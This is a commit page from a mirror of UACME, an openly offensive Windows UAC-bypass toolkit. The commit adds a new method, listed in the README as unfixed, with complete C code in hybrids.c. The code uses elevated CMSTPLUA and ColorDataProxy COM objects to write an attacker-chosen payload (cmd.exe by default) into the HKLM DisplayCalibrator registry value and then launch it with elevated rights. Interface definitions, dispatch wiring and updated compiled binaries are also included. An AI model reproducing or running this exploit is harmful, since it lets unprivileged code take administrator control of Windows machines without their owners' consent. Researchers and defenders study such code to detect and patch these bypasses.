Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

v 2.8.3 

Method 43 added, readme updated.
This commit is contained in:
hfiref0x 2017-11-10 13:31:20 +07:00
parent fbe43a1bdb
commit d4bf4d72ff
17 changed files with 297 additions and 41 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Akagi32.exe
View File

Binary file not shown.

BIN
Compiled/Akagi64.exe
View File

Binary file not shown.

8
README.md
View File

@ -353,6 +353,14 @@ Keys (watch debug output with dbgview or similar for more info):
* Works from: Windows 7 (7600)
* Fixed in: currently unavailable in preview builds of Windows 10 RS4
* How: Shell redesign
43. Author: Oddvar Moe derivative
* Type: Elevated COM interface
* Method: IColorDataProxy, ICMLuaUtil
* Target(s): Attacker defined
* Component(s): Attacker defined
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
Note:
* Method (6) unavailable in wow64 environment starting from Windows 8;

BIN
Source/Akagi/Resource.rc
View File

Binary file not shown.

9
Source/Akagi/consts.h
View File

@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 2.82
* VERSION: 2.84
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* Global consts definition file.
*
@ -24,6 +24,7 @@
#define T_UACKEY L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"
#define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\"
#define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration"
#define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls"
#define T_EXEFILE_SHELL L"Software\\Classes\\exefile\\shell\\runas\\command"
#define T_MSC_SHELL L"Software\\Classes\\mscfile\\shell\\open\\command"
@ -153,15 +154,19 @@
#define COR_PROFILER_PATH L"COR_PROFILER_PATH"
#define COR_ENABLE_PROFILING L"COR_ENABLE_PROFILING"
#define T_CALIBRATOR_VALUE L"DisplayCalibrator"
//
//COM objects elevation.
//
#define T_CLSID_ColorDataProxy L"{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}"
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_CLSID_FileOperation L"{3AD05575-8857-4850-9277-11B85BDB8E09}"
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}"
#define T_CLSID_ShellSecurityEditor L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}"
#define T_CLSID_UninstallStringLauncher L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}"
#define T_IID_IColorDataProxy L"{0A16D195-6F47-4964-9287-9F4BAB6D9827}"
#define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-45DF-8768-664147864573}"
#define T_IID_ISecurityEditor L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}"

21
Source/Akagi/methods/api0cradle.h
View File

@ -4,9 +4,9 @@
*
* TITLE: API0CRADLE.H
*
* VERSION: 2.79
* VERSION: 2.83
*
* DATE: 16 Aug 2017
* DATE: 04 Nov 2017
*
* Prototypes and definitions for api0cradle method.
*
@ -56,14 +56,19 @@ typedef struct ICMLuaUtilVtbl {
HRESULT(STDMETHODCALLTYPE *ShellExec)(
__RPC__in ICMLuaUtil * This,
_In_ LPCTSTR lpFile,
_In_opt_ LPCTSTR lpParameters,
_In_opt_ LPCTSTR lpDirectory,
_In_ ULONG fMask,
_In_ ULONG nShow
_In_opt_ LPCTSTR lpParameters,
_In_opt_ LPCTSTR lpDirectory,
_In_ ULONG fMask,
_In_ ULONG nShow
);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(
__RPC__in ICMLuaUtil * This,
_In_ HKEY hKey,
_In_opt_ LPCTSTR lpSubKey,
_In_opt_ LPCTSTR lpValueName,
_In_ LPCTSTR lpValueString
);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in ICMLuaUtil * This);

82
Source/Akagi/methods/cdproxy.h Normal file
View File

@ -0,0 +1,82 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: CDPROXY.H
*
* VERSION: 2.83
*
* DATE: 04 Nov 2017
*
* Prototypes and definitions for ColorDataProxy method.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef interface IColorDataProxy IColorDataProxy;
typedef struct IColorDataProxyVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IColorDataProxy * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in IColorDataProxy * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *LaunchDccw)(
__RPC__in IColorDataProxy * This,
_In_ HWND hwnd);
END_INTERFACE
} *PIColorDataProxyVtbl;
interface IColorDataProxy
{
CONST_VTBL struct IColorDataProxyVtbl *lpVtbl;
};

1
Source/Akagi/methods/fwcpllua.h
View File

@ -18,7 +18,6 @@
*******************************************************************************/
#pragma once
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {

121
Source/Akagi/methods/hybrids.c
View File

@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
* VERSION: 2.82
* VERSION: 2.83
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* Hybrid UAC bypass methods.
*
@ -2182,3 +2182,120 @@ BOOL ucmFwCplLuaMethod(
return SUCCEEDED(r);
}
/*
* ucmDccwCOMMethod
*
* Purpose:
*
* Bypass UAC using ColorDataProxy/CCMLuaUtil undocumented COM interfaces.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmDccwCOMMethod(
_In_opt_ LPWSTR lpszPayload
)
{
HRESULT r = E_FAIL;
BOOL bCond = FALSE;
LPWSTR lpBuffer = NULL;
SIZE_T sz = 0;
IID xIID_ICMLuaUtil;
IID xIID_IColorDataProxy;
ICMLuaUtil *CMLuaUtil = NULL;
IColorDataProxy *ColorDataProxy = NULL;
WCHAR szBuffer[MAX_PATH + 1];
do {
//
// Select payload.
//
if (lpszPayload != NULL) {
lpBuffer = lpszPayload;
}
else {
//no payload specified, use default cmd.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
lpBuffer = szBuffer;
}
sz = _strlen(lpBuffer);
if (sz == 0)
break;
//
// Create elevated COM object for CMLuaUtil.
//
if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) {
break;
}
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_CMSTPLUA,
CLSCTX_LOCAL_SERVER,
&xIID_ICMLuaUtil,
&CMLuaUtil);
if (r != S_OK)
break;
if (CMLuaUtil == NULL) {
r = E_FAIL;
break;
}
//
// Write new custom calibrator value to HKLM.
//
r = CMLuaUtil->lpVtbl->SetRegistryStringValue(CMLuaUtil,
HKEY_LOCAL_MACHINE,
T_DISPLAY_CALIBRATION,
T_CALIBRATOR_VALUE,
lpBuffer);
if (FAILED(r))
break;
//
// Create elevated COM object for ColorDataProxy.
//
if (IIDFromString(T_IID_IColorDataProxy, &xIID_IColorDataProxy) != S_OK) {
break;
}
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_ColorDataProxy,
CLSCTX_LOCAL_SERVER,
&xIID_IColorDataProxy,
&ColorDataProxy);
if (r != S_OK)
break;
if (ColorDataProxy == NULL) {
r = E_FAIL;
break;
}
//
// Run our "custom calibrator".
//
ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0);
} while (bCond);
if (CMLuaUtil != NULL) {
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
if (ColorDataProxy != NULL) {
ColorDataProxy->lpVtbl->Release(ColorDataProxy);
}
return SUCCEEDED(r);
}

7
Source/Akagi/methods/hybrids.h
View File

@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.H
*
* VERSION: 2.82
* VERSION: 2.83
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* Prototypes and definitions for hybrid methods.
*
@ -111,3 +111,6 @@ BOOL ucmMethodCorProfiler(
BOOL ucmFwCplLuaMethod(
_In_opt_ LPWSTR lpszPayload);
BOOL ucmDccwCOMMethod(
_In_opt_ LPWSTR lpszPayload);

32
Source/Akagi/methods/methods.c
View File

@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
* VERSION: 2.81
* VERSION: 2.83
*
* DATE: 28 Oct 2017
* DATE: 04 Nov 2017
*
* UAC bypass dispatch.
*
@ -53,7 +53,8 @@ UCM_API(MethodHakril);
UCM_API(MethodCorProfiler);
UCM_API(MethodCOMHandlers);
UCM_API(MethodCMLuaUtil);
UCM_API(MethodFwCpl);
UCM_API(MethodFwCplLua);
UCM_API(MethodDccwCOM);
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
@ -98,7 +99,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodCorProfiler, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCOMHandlers, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCMLuaUtil, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodFwCpl, NULL, { 7600, 16300 }, PAYLOAD_ID_NONE, FALSE, TRUE, TRUE }
{ MethodFwCplLua, NULL, { 7600, 16300 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodDccwCOM, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }
};
/*
@ -776,7 +778,7 @@ UCM_API(MethodCMLuaUtil)
return ucmCMLuaUtilShellExecMethod(szBuffer);
}
UCM_API(MethodFwCpl)
UCM_API(MethodFwCplLua)
{
LPWSTR lpszPayload = NULL;
@ -795,3 +797,23 @@ UCM_API(MethodFwCpl)
return ucmFwCplLuaMethod(lpszPayload);
}
UCM_API(MethodDccwCOM)
{
LPWSTR lpszPayload = NULL;
UNREFERENCED_PARAMETER(Method);
UNREFERENCED_PARAMETER(ExtraContext);
UNREFERENCED_PARAMETER(PayloadCode);
UNREFERENCED_PARAMETER(PayloadSize);
//
// Select target application or use given by optional parameter.
//
if (g_ctx.OptionalParameterLength == 0)
lpszPayload = NULL;
else
lpszPayload = g_ctx.szOptionalParameter;
return ucmDccwCOMMethod(lpszPayload);
}

8
Source/Akagi/methods/methods.h
View File

@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
* VERSION: 2.82
* VERSION: 2.83
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* Prototypes and definitions for UAC bypass methods table.
*
@ -61,7 +61,8 @@ typedef enum _UCM_METHOD {
UacMethodCorProfiler, //+
UacMethodCOMHandlers, //+
UacMethodCMLuaUtil, //+
UacMethodFwCpl, //+
UacMethodFwCplLua, //+
UacMethodDccwCOM, //+
UacMethodMax
} UCM_METHOD;
@ -99,6 +100,7 @@ typedef struct _UCM_API_DISPATCH_ENTRY {
#include "apphelp.h"
#include "b33f.h"
#include "carberp.h"
#include "cdproxy.h"
#include "comet.h"
#include "comfileop.h"
#include "enigma0x3.h"

4
Source/Akagi/tests/test.c
View File

@ -4,9 +4,9 @@
*
* TITLE: TEST.C
*
* VERSION: 2.82
* VERSION: 2.83
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED

12
Source/Akagi/tests/test.h
View File

@ -20,6 +20,9 @@
typedef interface ITestInterface ITestInterface;
typedef HRESULT (STDMETHODCALLTYPE *MethodPfn)(
__RPC__in ITestInterface * This);
typedef struct ITestInterfaceVtbl {
BEGIN_INTERFACE
@ -29,13 +32,17 @@ typedef struct ITestInterfaceVtbl {
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ITestInterface * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
MethodPfn a[200];
/* HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
@ -81,7 +88,8 @@ typedef struct ITestInterfaceVtbl {
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method16)(
__RPC__in ITestInterface * This);
__RPC__in ITestInterface * This);*/
END_INTERFACE
} *PITestInterfaceVtbl;

1
Source/Akagi/uacme.vcxproj
View File

@ -426,6 +426,7 @@
<ClInclude Include="methods\apphelp.h" />
<ClInclude Include="methods\b33f.h" />
<ClInclude Include="methods\carberp.h" />
<ClInclude Include="methods\cdproxy.h" />
<ClInclude Include="methods\comet.h" />
<ClInclude Include="methods\comfileop.h" />
<ClInclude Include="methods\enigma0x3.h" />

3
Source/Akagi/uacme.vcxproj.filters
View File

@ -296,6 +296,9 @@
<ClInclude Include="methods\fwcpllua.h">
<Filter>Header Files\methods</Filter>
</ClInclude>
<ClInclude Include="methods\cdproxy.h">
<Filter>Header Files\methods</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Resource.rc">

29
UACME.sha256
View File

@ -1,5 +1,5 @@
04341ae85502f402ba09df680a59ad86edffb9e4d433b98d20bccbbfc74c7140 *Compiled\Akagi32.exe
67f0ad13918572c2b163185f03eb14b169f37d7863a13aadd5d3b1cfe3ade2b9 *Compiled\Akagi64.exe
5e2c78ab050bbb0390710df1766ca3431edb830d5c8bf552175b3b0b40dd3115 *Compiled\Akagi32.exe
30344b2d6335bd92331779bb3927275b20090f472345282e1a6d1515e86a4886 *Compiled\Akagi64.exe
12d2396c78432f3a0bd6281b39f3f83bf5573825aac475c94edba4886fd73ece *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
cfab4c45f324596e4f9a6eabedec3d2c2867e03d122ddf4becdf8b50c1ec8026 *Source\uacme.sln
@ -13,19 +13,19 @@ ef42ba52ea3b16d206ea6367b0311f544631d6f5b6110550facfc9954884a76b *Source\Akagi\b
3ee61cd0352be04ee3af1edb159ae094d4c9bcfe00db6f45c2479c965b98783e *Source\Akagi\bin64res.rc
5b746ce038ee93a1f99e423c0aa0d39976fce2dafd4e7d9d446ab6f0f0fb2c95 *Source\Akagi\compress.c
9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h
f696a00694bebf94b3210a26d77cc1157cebe2818fc679017db1a5333e21a127 *Source\Akagi\consts.h
f12f0a7fc07640d44bc0517c4855708c7b72671f00e7846c65cbd10f34a001dc *Source\Akagi\consts.h
68a7f3e03ec247d54f8b4ae52012e69177dd05c4b608dd9ee3bbf75d49401577 *Source\Akagi\global.h
3d9da9b6f4f68d9140b4ec7c962b56206459c5bca98e1db1e584483524bee9ce *Source\Akagi\main.c
a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
1f8ad6c4dd3f33f0c0277b823d0c5cb2e0413eef7b6b35df85da03018fb99e18 *Source\Akagi\Resource.rc
9b42af1fbe881ecc8cd22cd4d37446e810485befa9365a62a031865a2e81e2d7 *Source\Akagi\Resource.rc
4ba63fffb2838c59534b66f6f4e5960ff8559be59a01597ad560dc2cdcee3dbb *Source\Akagi\sup.c
af229de9ed6dae7fe5364381ab3ac96e4ac0e9b6a8f42078259dbe8dbec2711d *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
2eb157a5d218534435d07c9dddcdad303ef23b5757449f1629ba78bb0dbf9334 *Source\Akagi\uacme.vcxproj
2b87dc9e056ad349cbd7a79ce043acf4fea771b05842ac7023f601c9b37ff6a6 *Source\Akagi\uacme.vcxproj.filters
3a563ced011f65d84309ecac6e518560393a8b62f19ce8ef18d95bc9d8a34d22 *Source\Akagi\uacme.vcxproj
5ead1ab3d46fd0e04779882dfb35df51c6ea51939fbac78b2a0d9ff12f713c85 *Source\Akagi\uacme.vcxproj.filters
cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user
2d05d08e1436fa05e5247e876b3f187b3354b76f4cabfecbdc4e557968037424 *Source\Akagi\windefend.c
1b9e0a1f3734feb1d1f94defb48972b479225d76fc97997c9b240c0f3b6453a8 *Source\Akagi\windefend.h
@ -42,12 +42,13 @@ cf5e43ec5d5acb53045e88d8e8a2a34e3b3a2fbbdb4acb4ca37eb1c3e7b1d3dd *Source\Akagi\b
d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib
dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib
63930fd4e5fa4e67ec923c88995362e4d91c4c7a66be1da26b57ec37d89f3e29 *Source\Akagi\methods\api0cradle.c
6e5c157d02b69f573345bb460adf0032fa6fd9b5f7c390699995dbd3ab12a812 *Source\Akagi\methods\api0cradle.h
a73b25f6f839f29dd91587e5b8c19ae707575f8791e3ef08dd262349a04c111a *Source\Akagi\methods\api0cradle.h
c38c4dc7d03484215e6fa531a795e80bd1951504ca6938cad5886d17adbf4a27 *Source\Akagi\methods\apphelp.h
ff3430dee2f8043a4be9a1235a3baaedeeeeaec2a1befba068a46d9ef42f3c49 *Source\Akagi\methods\b33f.c
1ce892263ef00aa1ac52f365519e800d7ac4535ac55454f0c777b17033769d8c *Source\Akagi\methods\b33f.h
e374e07b617a16d72dd21de250e4611866b509de15715957bed018ea07db62c3 *Source\Akagi\methods\carberp.c
b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\methods\carberp.h
c62f98b79c86e4fa6b90f8af480f18bc21e2dc90af268ce6ba6e343789ac3856 *Source\Akagi\methods\cdproxy.h
0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c
@ -56,15 +57,15 @@ b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\m
878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h
e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
c80a6ec7ce870c8df4b9e15783dc077945852f7e9c078b49ba2f95a86bd222d9 *Source\Akagi\methods\fwcpllua.h
3827958bc16dcec779fa5751f1d368370285eb2bddfa30ff803478ee1c2cabf2 *Source\Akagi\methods\fwcpllua.h
6e2608ff58c3f1777a1cb0464b896c99eefbf933db4a8ff4de3465b849e49e99 *Source\Akagi\methods\gootkit.c
7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h
b0c8e8e88559fdb6ce96d2404c56b0830976d5f5911b89425cc26f686f36f02f *Source\Akagi\methods\hakril.c
6f2e173a90393eec705ad558c22874dbd41c07a597eff3448165a4124aaa442b *Source\Akagi\methods\hakril.h
f2fc69584696a2dfa052a6ff8650c715d526fc0b26258fe2f58c608f515f9a67 *Source\Akagi\methods\hybrids.c
534912bb33311a4e4dc35c12abd7a24642aa9e2acd94e2cba4896d7ba277295f *Source\Akagi\methods\hybrids.h
564fae5e3dee300847a3e0a09b24de853d8f510fc9dd0eb923a8fa2ec4dc80b4 *Source\Akagi\methods\methods.c
26d1b8fa856522556923d329d3324e4bb8b7698b7b74447f1a3b06b4491013b1 *Source\Akagi\methods\methods.h
9dd0de9e974824f28a6e02bfc3a6f37b5ac8edfa629fd87e2c4e1e73fa6c3c5f *Source\Akagi\methods\hybrids.c
354e8ec194b93264c998e7a999cedb909f7481eb0c0a5843a1fc129084bc8934 *Source\Akagi\methods\hybrids.h
b0eab04bb9fc3557270bf172429f21e41c20ee85d0f8b65989f1c06341bd9964 *Source\Akagi\methods\methods.c
b9776680e0f2ba72eff2a02619aae2c27c5debf194c690edae447c7faf919092 *Source\Akagi\methods\methods.h
4b9ef8073d1e9ad80050a74d53c7c4f11cfed18c6252faf49b2ea00502415a1b *Source\Akagi\methods\pitou.c
9faab51fb7a0614dcf285ea02b468aee1edb50bb00b9dda8da20260d7460d255 *Source\Akagi\methods\pitou.h
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c
@ -89,8 +90,8 @@ e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e *Source\Akagi\m
604d1cdf45c5a95bc9cf1bbf39ca05ef83013541101d34971c5cd7577e3d5247 *Source\Akagi\minhook\hde\pstdint.h
43bf687a9fff071b5f46070db4d36c846f8e069cdc57485ee897c499aacdde23 *Source\Akagi\minhook\hde\table32.h
b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2 *Source\Akagi\minhook\hde\table64.h
c3c98c9a4b43219bcd38bff7c21dd69af1e3c8912f338162e912ccabb495cff7 *Source\Akagi\tests\test.c
9b0ef3097318c0876b569b64f7ecdee3bba0a189aa770887d0b825ff7adc8dfb *Source\Akagi\tests\test.h
abf5350c10eedc9857741f0d221156007f3d78e283ae39a6421379685995c37c *Source\Akagi\tests\test.c
1402f6f278457fdea7bdedb49785c74d775c625c425fc347ece6652940c65878 *Source\Akagi\tests\test.h
09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress
4581ed25d561afd247c01d71d13c698b79503357f16d4c18832e01c2381ce630 *Source\Akatsuki\Akatsuki.vcxproj
9b57b5d6ca1ca38eb87ba36e82595525c4ccec1069ee81f4b24c6809c5b979b8 *Source\Akatsuki\Akatsuki.vcxproj.filters